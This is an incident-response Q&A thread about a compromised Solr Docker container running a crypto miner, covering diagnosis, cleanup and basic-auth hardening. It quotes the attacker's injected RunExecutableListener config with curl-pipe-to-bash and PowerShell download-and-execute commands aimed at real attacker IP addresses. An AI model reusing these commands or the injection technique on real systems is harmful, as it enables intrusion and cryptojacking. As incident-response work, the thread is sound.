# SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process

Tags: security, solr

Prehistory:

1. My friend's site started to work slowly.
2. This site uses `docker`.
3. `htop` told me that all cores loaded on 100% by the process `/var/tmp/sustes` with the user `8983`. Tried to find out what is `sustes`, but Google did not help, but `8983` tells that the problem in `Solr` container.
4. Tried to update `Solr` from v6.? to 7.4 and got the message:

   `o.a.s.c.SolrCore Error while closing
   ...
   Caused by: org.apache.solr.common.SolrException: Error loading class 
   'solr.RunExecutableListener'`

   Rolled back to v6.6.4 (as the only available v6 on docker-hub https://hub.docker.com/_/solr/) as site should continue working.
5. In `Docker`s logs I found:

   `[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{
   "exe":"sh",
   "name":"newlistener-02",
   "args":[
       -"c",
       "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
   "event":"newSearcher",
   "class":"solr.RunExecutableListener",
   "dir":"/bin/"}}]`
6. So at http://192.99.142.226:8220/mr.sh we can find the malware code which installs crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).
7. Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can find full config, but right now we need just `listener` section:

   `"listener":[{
       "event":"newSearcher",
       "class":"solr.QuerySenderListener",
       "queries":[]},
     {
       "event":"firstSearcher",
       "class":"solr.QuerySenderListener",
       "queries":[]},
     {
       "exe":"sh",
       "name":"newlistener-02",
       "args":["-c",
         "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
       "event":"newSearcher",
       "class":"solr.RunExecutableListener",
       "dir":"/bin/"},
     {
       "exe":"sh",
       "name":"newlistener-25",
       "args":["-c",
         "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
       "event":"newSearcher",
       "class":"solr.RunExecutableListener",
       "dir":"/bin/"},
     {
       "exe":"cmd.exe",
       "name":"newlistener-00",
       "args":["/c",
         "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
       "event":"newSearcher",
       "class":"solr.RunExecutableListener",
       "dir":"cmd.exe"}],`
8. As we do not have such settings at `solrconfig.xml`, I found them at `/opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json` (the settings of this file can be found at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay

Comment: Restructure it as a proper question/answer and accept your own answer - and you should be good to go :-)

Answer (score 6, accepted):

Fixing:

9. Clean `configoverlay.json`, or simply remove this file (`rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json`).
10. Restart Solr (how to Start\Stop - https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart docker container.

---

As I understand, this attack is possible due to `CVE-2017-12629`:

1. How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
2. CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc

... and is being fixed in v5.5.5, 6.6.2+, 7.1+

which is due to freely available http://example.com:8983 for anyone, so despite this exploit is fixed, lets...

---

11. Add protection to http://example.com:8983

    Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin

    Create `security.json` with:

    `{
    "authentication":{
     "blockUnknown": true,
     "class":"solr.BasicAuthPlugin",
     "credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= 
    Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
    },
    "authorization":{
     "class":"solr.RuleBasedAuthorizationPlugin",
     "permissions":[{"name":"security-edit",
        "role":"admin"}],
     "user-role":{"solr":"admin"}
    }}`

    This file must be dropped at `/opt/solr/server/solr/` (ie next to `solr.xml`)

    As `Solr` has its own Hash-checker (as a sha256(password+salt) hash), a typical solution can not be used here. The easiest way to generate hash that Ive found is to download `jar` file from here http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as `java -jar SolrPasswordHash.jar NewPassword`.

Because I use `docker-compose`, I simply build `Solr` like this:

```
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/

# project/sources/docker-compose.yml (just Solr part)
solr:
  build: ./dockerfiles/solr/
  container_name: solr-container

  # Check if 'default' core is created. If not, then create it.
  entrypoint:
    - docker-entrypoint.sh
    - solr-precreate
    - default

  # Access to web interface from host to container, i.e 127.0.0.1:8983
  ports:
    - "8983:8983"
  volumes:
  - ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default  # configs
  - ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data  # indexes
```